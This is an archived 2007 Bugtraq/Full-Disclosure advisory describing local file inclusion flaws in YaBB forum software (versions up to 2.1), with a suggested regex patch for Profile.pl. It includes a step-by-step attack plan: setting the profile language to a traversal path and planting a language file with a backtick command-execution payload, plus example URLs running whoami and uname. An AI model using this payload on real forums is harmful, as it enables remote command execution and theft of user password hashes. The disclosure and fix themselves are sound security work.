lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 19 Jun 2007 15:28:39 +0200
From: krasza <krasza@...il.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Local File Include Vulnerabilities in YaBB <=
	2.1(all version)

Local File Include Vulnerabilities

Problem: Local File Include Vulnerabilities
Product: YaBB <= 2.1(all version)
Web page:http://www.yabbforum.com/

Credit:Maciej `krasza` Kukla
@mail:krasza@...il.com
homepage:www.krasza.int.pl

1.Description

"YaBB is a leading free forum software package that rivals any professional
message board out there. It provides a real-time chat and support system for
your visitors. While chat programs allow people to talk directly, you have
to be on at the same time as others. With forum software like YaBB, you can
talk any time, and everyone can join in the conversation! Build a community
and get visitors to come back for interesting discussions, fun chit chat, or
needed support without having to spend thousands of dollars."

http://www.google.pl/search?q=Powered+by+YaBB => 1,640,000 clients

2. Local File Include

I found many bugs like it in this board.Bugs relate one special variable for
user($language, you can edit this variable in your profile). Examples, where
I found bugs:

---Sources/HelpCentre.pl:139---
if (-e ("$helpfile/$language/$help_area/$line.help")) {
                        require "$helpfile/$language/$help_area/$line.help";
}
---end---

---Sources/Subs.pl:1529---
if (-e "$langdir/$use_lang/$what_to_load.lng") {
        require "$langdir/$use_lang/$what_to_load.lng";
}
---end---

---Sources/ICQPager.pl:21---
if ($language) { require "$langdir/$language/ICQ.lng"; }
---end---

---Sources/Post.pl:1838---
if (-e "$langdir/$actlang/Notify.lng") { require
"$langdir/$actlang/Notify.lng"; }
---end---

---Sources/Post.pl:1863---
if (-e "$langdir/$actlang/Notify.lng") { require
"$langdir/$actlang/Notify.lng"; }
---end---

---Sources/Post.pl:1880---
if (-e "$langdir/$actlang/Notify.lng") { require
"$langdir/$actlang/Notify.lng"; }
---end---

---Sources/InstantMessage.pl:1080---
if (-e "$langdir/$actlang/InstantMessage.lng") { require
"$langdir/$actlang/InstantMessage.lng"; }
---end---

---Sources/InstantMessage.pl:1082---
if (-e "$langdir/$actlang/InstantMessage.lng") { require
"$langdir/$actlang/Main.lng"; }
---end---

You can set this variable in profile's module.Thanks to uses the "../"
characters, You can read other user's files(where is hash of password), exec
other perl's script(so exec your code) etc.

Example 'plan of attacking' page, where is YaBB's forum(exec your command on
server):

        1.Find web, where is YaBB's forum(example '
http://victim.com/~krasza/yabb2/')
        2.Modify your local's folder 'English' (from YaBB's packet)
                English/HelpCentre.lng
                ---
                %helptxt = (
                '1' => "Help Section",
                '2' => "Contents",
                ---

                change for:

                ---
                $content="<br><br><br><br><font color=red>";
                $content.=`$INFO{'cmd'}`;
                $content.="</font><br><br><br><br>";
                %helptxt = (
                '1' => "Help Section",
                '2' => $content,
                ---

        3.Copy your local's folder 'folder' to your account on attack's
server(victim.com)
        4.Create a new user(example 'attacker') on attack's forum('
http://vicitm.com/~krasza/yabb2/')
        5.Edit your profile and set 'userlangue' on
"../../path/your/folder/where/is/English's/folder/"(I propose you use
'Tamper Data'-plugin for Firefox);
        6.Go to 'Help' on Yabb's page in your browser ('
http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help');
        7.Now Thanks to 'cmd' var, You can exec your command, example:


http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=whoami returns
'nobody'(red color) on top in left frame.

http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=uname%20-a returns
'Linux thrall 2.4.31 #21 Sun Jun 5 19:19:51 PDT 2005 i686 unknown unknown
GNU/Linux '
                etc.


3.Exploits:

If you much want to look exploit for this bug, I will can publish my code. I
don't prefer  publish my exploits. I think, that 'plan of attacking page'
should suffice you.


4.Fix:

YaBB must filter language's var in profile's module.Until YaBB company will
publish oficial fix, You should edit Sources/Profile.pl by this means:

---Sources/Profile.pl:1225---
if ($member{'userlanguage'} !~
m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@/]+\Z^ && $member{'userlanguage'}
ne "") { &fatal_error($profile_txt{'815'}); }
---end---

change for:

---Sources/Profile.pl:1225---
if ($member{'userlanguage'} !~
m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@]+\Z^ && $member{'userlanguage'} ne
"") { &fatal_error($profile_txt{'815'}); }
---end---

This version will deny injecting slash '/'.



Maciej `krasza` Kukla
krasza@...il.com
www.krasza.int.pl

http://www.krewniacy.pl

-- 
Best regards, Maciej `krasza` Kukla

Content of type "text/html" skipped

View attachment "bugtraq.txt" of type "text/plain" (4482 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ